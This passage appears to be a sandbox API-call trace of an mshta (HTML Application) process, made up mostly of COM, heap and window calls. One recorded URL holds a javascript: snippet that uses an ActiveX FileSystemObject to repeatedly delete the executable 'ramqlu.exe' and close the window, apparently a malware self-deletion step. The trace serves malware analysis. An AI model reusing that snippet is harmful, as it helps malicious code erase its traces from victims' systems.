riid=0x76814430*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x2cf014 | out: ppv=0x2cf014*=0x75028d20) returned 0x0 [0066.859] IUnknown:Release (This=0x75028d20) returned 0x1 [0066.861] IBindStatusCallback:OnStartBinding (This=0x453428, dwReserved=0xff, pib=0x455488) returned 0x0 [0066.861] IUnknown:AddRef (This=0x455488) returned 0x2 [0066.861] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0066.861] IUnknown:QueryInterface (in: This=0x453428, riid=0x768146b8*(Data1=0x79eac9e4, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x2cefd8 | out: ppvObject=0x2cefd8*=0x0) returned 0x80004002 [0066.861] IServiceProvider:QueryService (in: This=0x45342c, guidService=0x768146b8*(Data1=0x79eac9e4, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), riid=0x768146b8*(Data1=0x79eac9e4, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x2cefd8 | out: ppvObject=0x2cefd8*=0x0) returned 0x80004002 [0066.861] GetCurrentThreadId () returned 0x90 [0066.861] DllGetClassObject (in: rclsid=0x44120c*(Data1=0x3050f3b2, Data2=0x98b5, Data3=0x11cf, Data4=([0]=0xbb, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xbd, [6]=0xce, [7]=0xb)), riid=0x76814430*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x2cefe8 | out: ppv=0x2cefe8*=0x75028d20) returned 0x0 [0066.862] IClassFactory:CreateInstance (in: This=0x75028d20, pUnkOuter=0x4555f0, riid=0x7681482c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x455614 | out: ppvObject=0x455614*=0x454348) returned 0x0 [0066.883] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x98) returned 0x454348 [0066.883] IUnknown_QueryService (in: punk=0x4555f0, guidService=0x74ccb940*(Data1=0x332c4427, Data2=0x26cb, Data3=0x11d0, Data4=([0]=0xb4, [1]=0x83, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xd9, [6]=0x1, [7]=0x19)), riid=0x74ccb940*(Data1=0x332c4427, Data2=0x26cb, Data3=0x11d0, Data4=([0]=0xb4, [1]=0x83, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xd9, [6]=0x1, [7]=0x19)), ppvOut=0x2cf018 | out: ppvOut=0x2cf018*=0x444aa4) returned 0x0 [0066.884] IUnknown:QueryInterface (in: This=0x453428, riid=0x74ccb940*(Data1=0x332c4427, Data2=0x26cb, Data3=0x11d0, Data4=([0]=0xb4, [1]=0x83, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xd9, [6]=0x1, [7]=0x19)), ppvObject=0x2ceec0 | out: ppvObject=0x2ceec0*=0x0) returned 0x80004002 [0066.884] IServiceProvider:QueryService (in: This=0x45342c, guidService=0x74ccb940*(Data1=0x332c4427, Data2=0x26cb, Data3=0x11d0, Data4=([0]=0xb4, [1]=0x83, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xd9, [6]=0x1, [7]=0x19)), riid=0x74ccb940*(Data1=0x332c4427, Data2=0x26cb, Data3=0x11d0, Data4=([0]=0xb4, [1]=0x83, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xd9, [6]=0x1, [7]=0x19)), ppvObject=0x2ceec0 | out: ppvObject=0x2ceec0*=0x444aa4) returned 0x0 [0066.884] GetCurrentThreadId () returned 0x90 [0066.935] IUnknown:QueryInterface (in: This=0x454348, riid=0x768146b8*(Data1=0x79eac9e4, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x455678 | out: ppvObject=0x455678*=0x45435c) returned 0x0 [0066.935] IUnknown:AddRef (This=0x4555f0) returned 0x7 [0066.935] IUnknown:Release (This=0x75028d20) returned 0x1 [0066.936] IUnknown:Release (This=0x45435c) returned 0x6 [0066.936] IUnknown:Release (This=0x4555f0) returned 0x6 [0066.936] IUnknown:AddRef (This=0x45435c) returned 0x7 [0066.936] IUnknown:AddRef (This=0x4555f0) returned 0x7 [0066.936] IUnknown:Release (This=0x45435c) returned 0x6 [0066.936] IUnknown:Release (This=0x4555f0) returned 0x6 [0066.936] IUnknown:QueryInterface (in: This=0x45435c, riid=0x76826b10*(Data1=0x79eac9eb, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x2cf0c4 | out: ppvObject=0x2cf0c4*=0x455600) returned 0x0 [0066.936] IUnknown:QueryInterface (in: This=0x4555f0, riid=0x76826b10*(Data1=0x79eac9eb, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x2cf0c4 | out: ppvObject=0x2cf0c4*=0x455600) returned 0x0 [0066.936] IUnknown:QueryInterface (in: This=0x454348, riid=0x76826b00*(Data1=0xc7a98e66, Data2=0x1010, Data3=0x492c, Data4=([0]=0xa1, [1]=0xc8, [2]=0xc8, [3]=0x9, [4]=0xe1, [5]=0xf7, [6]=0x59, [7]=0x5)), ppvObject=0x2cf0d0 | out: ppvObject=0x2cf0d0*=0x0) returned 0x80004002 [0067.702] IUnknown:AddRef (This=0x4555f0) returned 0x8 [0067.702] CoInternetParseUrl (in: pwzUrl="javascript:o=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{o.DeleteFile('ramqlu.exe');close()}catch(e){}},10);", ParseAction=0x13, dwFlags=0x0, pszResult=0x2cd090, cchResult=0x1000, pcchResult=0x2cd078, dwReserved=0x0 | out: pszResult="javascript:o=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{o.DeleteFile('ramqlu.exe');close()}catch(e){}},10);", pcchResult=0x2cd078) returned 0x0 [0067.703] DllGetClassObject (in: rclsid=0x44120c*(Data1=0x3050f3b2, Data2=0x98b5, Data3=0x11cf, Data4=([0]=0xbb, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xbd, [6]=0xce, [7]=0xb)), riid=0x76814430*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x2ccf0c | out: ppv=0x2ccf0c*=0x75028d20) returned 0x0 [0067.703] IUnknown:QueryInterface (in: This=0x75028d20, riid=0x7683aadc*(Data1=0x79eac9ec, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x2ccff8 | out: ppvObject=0x2ccff8*=0x75028d2c) returned 0x0 [0067.703] IUnknown:Release (This=0x75028d20) returned 0x1 [0067.703] IInternetProtocolInfo:ParseUrl (in: This=0x75028d2c, pwzUrl="javascript:o=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{o.DeleteFile('ramqlu.exe');close()}catch(e){}},10);", ParseAction=19, dwParseFlags=0x0, pwzResult=0x2cd090, cchResult=0x1000, pcchResult=0x2cd078, dwReserved=0x0 | out: pwzResult="텼,", pcchResult=0x2cd078*=0x2cd17c) returned 0x800c0011 [0067.703] IUnknown:Release (This=0x75028d2c) returned 0x1 [0067.703] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x11c) returned 0x454bf0 [0067.704] IUnknown:Release (This=0x4503c0) returned 0x2 [0067.704] IUnknown:Release (This=0x43c254) returned 0x17 [0067.704] IUnknown:Release (This=0x43c254) returned 0x16 [0067.704] IUnknown:Release (This=0x43c254) returned 0x15 [0067.704] CoTaskMemFree (pv=0x0) [0067.704] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x1a8) returned 0x454d18 [0067.704] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x2cf510 | out: lpCPInfo=0x2cf510) returned 1 [0067.704] IUnknown:AddRef (This=0x43f548) returned 0x3 [0067.704] IUnknown:AddRef (This=0x43c254) returned 0x16 [0067.704] IUnknown:QueryInterface (in: This=0x43c254, riid=0x74cad6e8*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x2cf518 | out: ppvObject=0x2cf518*=0x43c254) returned 0x0 [0067.705] IUnknown:Release (This=0x43c254) returned 0x16 [0067.705] IUnknown:AddRef (This=0x43c254) returned 0x17 [0067.705] IUri:GetScheme (in: This=0x43c254, pdwScheme=0x2cf51c | out: pdwScheme=0x2cf51c*=0xf) returned 0x0 [0067.705] IUnknown:Release (This=0x43f548) returned 0x2 [0067.705] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x58) returned 0x459a10 [0067.705] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x150 [0067.705] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x74c1e718, lpParameter=0x459a10, dwCreationFlags=0x0, lpThreadId=0x459a24 | out: lpThreadId=0x459a24*=0x94c) returned 0x12c [0067.706] GetCurrentThreadId () returned 0x90 [0067.707] IUnknown:Release (This=0x43c254) returned 0x16 [0067.707] IUnknown:Release (This=0x43bfcc) returned 0x3 [0067.707] IUnknown:Release (This=0x4206a8) returned 0x3 [0067.707] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0067.707] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0067.707] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0067.707] IUnknown:Release (This=0x43c254) returned 0x15 [0067.707] IUnknown:Release (This=0x43c254) returned 0x14 [0067.707] IUnknown:Release (This=0x43c254) returned 0x13 [0067.707] IUnknown:Release (This=0x4206a8) returned 0x2 [0067.707] IUnknown:Release (This=0x43c254) returned 0x12 [0067.707] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0067.708] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0067.708] CoTaskMemFree (pv=0x451ae0) [0067.708] CoTaskMemFree (pv=0x0) [0067.708] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0067.708] IUnknown:Release (This=0x43c254) returned 0x11 [0067.708] CoTaskMemFree (pv=0x4519c0) [0067.708] GetClientRect (in: hWnd=0x3017c, lpRect=0x2cfa34 | out: lpRect=0x2cfa34) returned 1 [0067.708] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x78) returned 0x421a38 [0067.709] GetClientRect (in: hWnd=0x3017c, lpRect=0x421a64 | out: lpRect=0x421a64) returned 1 [0067.709] OffsetRect (in: lprc=0x421a64, dx=0, dy=0 | out: lprc=0x421a64) returned 1 [0067.709] OffsetRect (in: lprc=0x421a74, dx=0, dy=0 | out: lprc=0x421a74) returned 1 [0067.709] RegisterClassExW (param_1=0x2cf550) returned 0xc168 [0067.709] CoCreateInstance (in: rclsid=0x74c3bf70*(Data1=0x50d5107a, Data2=0xd278, Data3=0x4871, Data4=([0]=0x89, [1]=0x89, [2]=0xf4, [3]=0xce, [4]=0xaa, [5]=0xf5, [6]=0x9c, [7]=0xfc)), pUnkOuter=0x0, dwClsContext=0x401, riid=0x74c3bf60*(Data1=0x8c0e040, Data2=0x62d1, Data3=0x11d1, Data4=([0]=0x93, [1]=0x26, [2]=0x0, [3]=0x60, [4]=0xb0, [5]=0x67, [6]=0xb8, [7]=0x6e)), ppv=0x7502b020 | out: ppv=0x7502b020*=0x445c90) returned 0x0 [0067.714] CActiveIMMAppEx_Trident:IActiveIMMApp:FilterClientWindows (This=0x445c90, aaClassList=0x2cf648*=0xc168, uSize=0x1) returned 0x0 [0067.714] CreateWindowExW (dwExStyle=0x0, lpClassName=0xc168, lpWindowName=0x0, dwStyle=0x46000000, X=0, Y=0, nWidth=1064, nHeight=587, hWndParent=0x3017c, hMenu=0x0, hInstance=0x74af0000, lpParam=0x442fc8) returned 0x202a8 [0067.715] GetWindowLongW (hWnd=0x202a8, nIndex=-20) returned 0 [0067.715] SetWindowLongW (hWnd=0x202a8, nIndex=-21, dwNewLong=4468680) returned 0 [0067.715] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x445c90, hWnd=0x202a8, msg=0x81, wParam=0x0, lParam=0x2cf21c*=4468680, plResult=0x2cf094 | out: plResult=0x2cf094) returned 0x1 [0067.715] NtdllDefWindowProc_W () returned 0x1 [0067.715] GetCurrentThreadId () returned 0x90 [0067.715] GetWindowLongW (hWnd=0x202a8, nIndex=-21) returned 4468680 [0067.715] GetCurrentThreadId () returned 0x90 [0067.715] GetWindowLongW (hWnd=0x202a8, nIndex=-21) returned 4468680 [0067.715] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x445c90, hWnd=0x202a8, msg=0x1, wParam=0x0, lParam=0x2cf21c*=4468680, plResult=0x2cf094 | out: plResult=0x2cf094) returned 0x1 [0067.716] NtdllDefWindowProc_W () returned 0x0 [0067.716] GetCurrentThreadId () returned 0x90 [0067.716] GetWindowLongW (hWnd=0x202a8, nIndex=-21) returned 4468680 [0067.716] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x445c90, hWnd=0x202a8, msg=0x5, wParam=0x0, lParam=0x24b0428, plResult=0x2cf0e0 | out: plResult=0x2cf0e0) returned 0x1 [0067.716] NtdllDefWindowProc_W () returned 0x0 [0067.716] GetCurrentThreadId () returned 0x90 [0067.716] GetWindowLongW (hWnd=0x202a8, nIndex=-21) returned 4468680 [0067.716] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x445c90, hWnd=0x202a8, msg=0x3, wParam=0x0, lParam=0x0, plResult=0x2cf0e0 | out: plResult=0x2cf0e0) returned 0x1 [0067.716] NtdllDefWindowProc_W () returned 0x0 [0067.716] GetCurrentThreadId () returned 0x90 [0067.716] NtdllDefWindowProc_W () returned 0x0 [0067.716] GetClassNameW (in: hWnd=0x3017c, lpClassName=0x2cf650, nMaxCount=256 | out: lpClassName="HTML Application Host Window Class") returned 34 [0067.716] StrCmpIW (psz1="HTML Application Host Window Class", psz2="HTMLPageDesignerWndClass") returned -1 [0067.717] CActiveIMMAppEx_Trident:IActiveIMMApp:Activate (This=0x445c90, fRestoreLayout=1) returned 0x0 [0067.717] SendMessageW (hWnd=0x202a8, Msg=0x129, wParam=0x0, lParam=0x0) returned 0x3 [0067.717] GetWindowLongW (hWnd=0x202a8, nIndex=-21) returned 4468680 [0067.717] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x445c90, hWnd=0x202a8, msg=0x129, wParam=0x0, lParam=0x0, plResult=0x2cf504 | out: plResult=0x2cf504) returned 0x1 [0067.717] NtdllDefWindowProc_W () returned 0x3 [0067.717] GetCurrentThreadId () returned 0x90 [0067.717] IntersectRect (in: lprcDst=0x2cf884, lprcSrc1=0x421a64, lprcSrc2=0x421a74 | out: lprcDst=0x2cf884) returned 1 [0067.717] EqualRect (lprc1=0x2cf884, lprc2=0x421a64) returned 1 [0067.717] InvalidateRect (hWnd=0x202a8, lpRect=0x0, bErase=1) returned 1 [0067.717] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0xf0) returned 0x451ac0 [0067.717] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x150) returned 0x459a70 [0067.717] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x140) returned 0x459bc8 [0067.717] IntersectRect (in: lprcDst=0x2cf770, lprcSrc1=0x2cf770, lprcSrc2=0x2cf708 | out: lprcDst=0x2cf770) returned 1 [0067.717] IntersectRect (in: lprcDst=0x2cf770, lprcSrc1=0x2cf770, lprcSrc2=0x2cf708 | out: lprcDst=0x2cf770) returned 1 [0067.718] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x60) returned 0x459d10 [0067.718] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x30) returned 0x42da70 [0067.718] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xec) returned 0x459d78 [0067.718] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0067.718] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0067.718] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x30) returned 0x42daa8 [0067.718] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x10) returned 0x4516d0 [0067.718] GetCurrentThreadId () returned 0x90 [0067.718] GetCurrentThreadId () returned 0x90 [0067.718] GetCurrentThreadId () returned 0x90 [0067.718] IntersectRect (in: lprcDst=0x2cf5ac, lprcSrc1=0x2cf5ac, lprcSrc2=0x2cf57c | out: lprcDst=0x2cf5ac) returned 1 [0067.718] IntersectRect (in: lprcDst=0x459c28, lprcSrc1=0x459c28, lprcSrc2=0x2cf59c | out: lprcDst=0x459c28) returned 1 [0067.718] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0067.718] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x28) returned 0x453648 [0067.718] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x453648 | out: hHeap=0x410000) returned 1 [0067.719] SetWindowPos (hWnd=0x202a8, hWndInsertAfter=0x0, X=0, Y=0, cx=0, cy=0, uFlags=0x5f) returned 1 [0067.719] GetWindowLongW (hWnd=0x202a8, nIndex=-21) returned 4468680 [0067.719] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x445c90, hWnd=0x202a8, msg=0x46, wParam=0x0, lParam=0x2cf864*=131752, plResult=0x2cf700 | out: plResult=0x2cf700) returned 0x1 [0067.719] NtdllDefWindowProc_W () returned 0x0 [0067.719] GetCurrentThreadId () returned 0x90 [0067.719] GetWindowLongW (hWnd=0x202a8, nIndex=-21) returned 4468680 [0067.719] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x445c90, hWnd=0x202a8, msg=0x47, wParam=0x0, lParam=0x2cf864*=131752, plResult=0x2cf6fc | out: plResult=0x2cf6fc) returned 0x1 [0067.719] NtdllDefWindowProc_W () returned 0x0 [0067.720] GetCurrentThreadId () returned 0x90 [0067.720] SetTimer (hWnd=0x202a8, nIDEvent=0x1000, uElapse=0x64, lpTimerFunc=0x0) returned 0x1000 [0067.720] GetFocus () returned 0x0 [0067.720] EnumChildWindows (hWndParent=0x202a8, lpEnumFunc=0x74e10a73, lParam=0x2cf75c) returned 0 [0067.720] GetFocus () returned 0x0 [0067.720] SetFocus (hWnd=0x202a8) returned 0x0 [0067.721] NtdllDefWindowProc_W () returned 0x0 [0067.721] NtdllDefWindowProc_W () returned 0x0 [0067.722] NtdllDefWindowProc_W () returned 0x0 [0067.722] NtdllDefWindowProc_W () returned 0x0 [0067.722] NtdllDefWindowProc_W () returned 0x0 [0067.723] NtdllDefWindowProc_W () returned 0x0 [0067.723] NtdllDefWindowProc_W () returned 0x0 [0067.723] NtdllDefWindowProc_W () returned 0x0 [0067.723] NtdllDefWindowProc_W () returned 0x0 [0067.724] NtdllDefWindowProc_W () returned 0x0 [0067.724] NtdllDefWindowProc_W () returned 0x1 [0067.724] NtdllDefWindowProc_W () returned 0x0 [0067.725] NtdllDefWindowProc_W () returned 0x0 [0068.466] GetWindowLongW (hWnd=0x202a8, nIndex=-21) returned 4468680 [0068.466] LoadLibraryA (lpLibFileName="OLEACC.DLL") returned 0x75300000 [0068.469] GetProcAddress (hModule=0x75300000, lpProcName="LresultFromObject") returned 0x75302663 [0068.469] LresultFromObject () returned 0xc171 [0069.349] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x14) returned 0x453090 [0069.350] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x28) returned 0x453738 [0069.835] GetCurrentThreadId () returned 0x90 [0069.837] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x453090 | out: hHeap=0x410000) returned 1 [0069.838] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x60) returned 0x461740 [0069.838] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x14) returned 0x453090 [0069.838] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x45ef48 [0069.838] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x461740 | out: hHeap=0x410000) returned 1 [0069.839] IUnknown:QueryInterface (in: This=0x444bf4, riid=0x758221d8*(Data1=0xb196b284, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x2cf010 | out: ppvObject=0x2cf010*=0x461740) returned 0x0 [0069.839] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x60) returned 0x461740 [0069.839] IConnectionPointContainer:FindConnectionPoint (in: This=0x461740, riid=0x758221b8*(Data1=0x3050f625, Data2=0x98b5, Data3=0x11cf, Data4=([0]=0xbb, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xbd, [6]=0xce, [7]=0xb)), ppCP=0x2cf028 | out: ppCP=0x2cf028*=0x461768) returned 0x0 [0069.839] IConnectionPoint:Advise (in: This=0x461768, pUnkSink=0x46be68, pdwCookie=0x46be80 | out: pdwCookie=0x46be80*=0x46be68) returned 0x0 [0069.839] IUnknown:QueryInterface (in: This=0x46be68, riid=0x74afa638*(Data1=0x3050f625, Data2=0x98b5, Data3=0x11cf, Data4=([0]=0xbb, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xbd, [6]=0xce, [7]=0xb)), ppvObject=0x2cefcc | out: ppvObject=0x2cefcc*=0x46be68) returned 0x0 [0069.840] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x14) returned 0x4530d0 [0069.840] IUnknown:AddRef (This=0x46be68) returned 0x3 [0069.840] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x45ef90 [0069.840] IUnknown:Release (This=0x46be68) returned 0x2 [0069.840] IUnknown:Release (This=0x461768) returned 0x0 [0069.840] IUnknown:Release (This=0x461740) returned 0x0 [0069.840] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x461740 | out: hHeap=0x410000) returned 1 [0069.841] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x28) returned 0x4537c8 [0069.841] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x48) returned 0x45db80 [0069.841] GetWindowLongW (hWnd=0x202a8, nIndex=-21) returned 4468680 [0069.842] GetMessageTime () returned 0 [0069.842] GetMessagePos () returned 0x0 [0069.842] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x445c90, hWnd=0x202a8, msg=0x281, wParam=0x1, lParam=0xc000000f, plResult=0x2cf124 | out: plResult=0x2cf124) returned 0x0 [0069.844] GetWindowLongW (hWnd=0x202a8, nIndex=-21) returned 4468680 [0069.844] GetMessageTime () returned 0 [0069.844] GetMessagePos () returned 0x0 [0069.844] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x445c90, hWnd=0x202a8, msg=0x282, wParam=0x2, lParam=0x0, plResult=0x2ceb54 | out: plResult=0x2ceb54) returned 0x0 [0069.845] GetCurrentThreadId () returned 0x90 [0069.845] GetCurrentThreadId () returned 0x90 [0069.845] GetWindowLongW (hWnd=0x202a8, nIndex=-21) returned 4468680 [0069.845] GetMessageTime () returned 0 [0069.845] GetMessagePos () returned 0x0 [0069.845] ScreenToClient (in: hWnd=0x202a8, lpPoint=0x2cf2d8 | out: lpPoint=0x2cf2d8) returned 1 [0069.846] ScreenToClient (in: hWnd=0x202a8, lpPoint=0x2cf2d8 | out: lpPoint=0x2cf2d8) returned 1 [0069.846] GetCapture () returned 0x0 [0069.846] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x30) returned 0x45c268 [0069.846] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x28) returned 0x4537f8 [0069.849] IUnknown:AddRef (This=0x46be68) returned 0x5 [0069.849] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x10) returned 0x45ff48 [0069.849] HTMLWindowEvents2:onresize (This=0x46be68, pEvtObj=0x418) [0069.849] IUnknown:Release (This=0x46be68) returned 0x4 [0069.849] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x45ff48 | out: hHeap=0x410000) returned 1 [0069.849] GetCurrentThreadId () returned 0x90 [0069.849] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x45c268 | out: hHeap=0x410000) returned 1 [0069.849] GetCurrentThreadId () returned 0x90 [0069.849] GetCurrentThreadId () returned 0x90 [0069.849] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x445c90, hWnd=0x202a8, msg=0x7, wParam=0x0, lParam=0x0, plResult=0x2cf514 | out: plResult=0x2cf514) returned 0x1 [0069.849] NtdllDefWindowProc_W () returned 0x0 [0069.849] GetCurrentThreadId () returned 0x90 [0069.850] CActiveIMMAppEx_Trident:IActiveIMMApp:getContext (in: This=0x445c90, hWnd=0x202a8, phIMC=0x2cf83c | out: phIMC=0x2cf83c*=0x402af) returned 0x0 [0069.850] CActiveIMMAppEx_Trident:IActiveIMMApp:AssociateContext (in: This=0x445c90, hWnd=0x202a8, hIME=0x0, phPrev=0x2cf83c | out: phPrev=0x2cf83c*=0x402af) returned 0x0 [0069.850] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x60) returned 0x461740 [0069.850] IConnectionPointContainer:FindConnectionPoint (in: This=0x461740, riid=0x758221c8*(Data1=0x3050f613, Data2=0x98b5, Data3=0x11cf, Data4=([0]=0xbb, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xbd, [6]=0xce, [7]=0xb)), ppCP=0x2cf6ac | out: ppCP=0x2cf6ac*=0x461760) returned 0x0 [0069.850] IConnectionPoint:Unadvise (This=0x461760, dwCookie=0x46be68) returned 0x0 [0069.850] IUnknown:AddRef (This=0x46be68) returned 0x5 [0069.850] IUnknown:Release (This=0x46be68) returned 0x4 [0069.850] IUnknown:Release (This=0x46be68) returned 0x3 [0069.850] IUnknown:Release (This=0x461760) returned 0x0 [0069.850] IUnknown:Release (This=0x461740) returned 0x0 [0069.850] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x461740 | out: hHeap=0x410000) returned 1 [0069.850] IUnknown:QueryInterface (in: This=0x444bf4, riid=0x758221d8*(Data1=0xb196b284, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x2cf6a4 | out: ppvObject=0x2cf6a4*=0x461740) returned 0x0 [0069.850] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x60) returned 0x461740 [0069.850] IConnectionPointContainer:FindConnectionPoint (in: This=0x461740, riid=0x758221b8*(Data1=0x3050f625, Data2=0x98b5, Data3=0x11cf, Data4=([0]=0xbb, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xbd, [6]=0xce, [7]=0xb)), ppCP=0x2cf6a8 | out: ppCP=0x2cf6a8*=0x461768) returned 0x0 [0069.851] IConnectionPoint:Unadvise (This=0x461768, dwCookie=0x46be68) returned 0x0 [0069.851] IUnknown:AddRef (This=0x46be68) returned 0x4 [0069.851] IUnknown:Release (This=0x46be68) returned 0x3 [0069.851] IUnknown:Release (This=0x46be68) returned 0x2 [0069.851] IUnknown:Release (This=0x461768) returned 0x0 [0069.851] IUnknown:Release (This=0x461740) returned 0x0 [0069.851] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x461740 | out: hHeap=0x410000) returned 1 [0069.851] 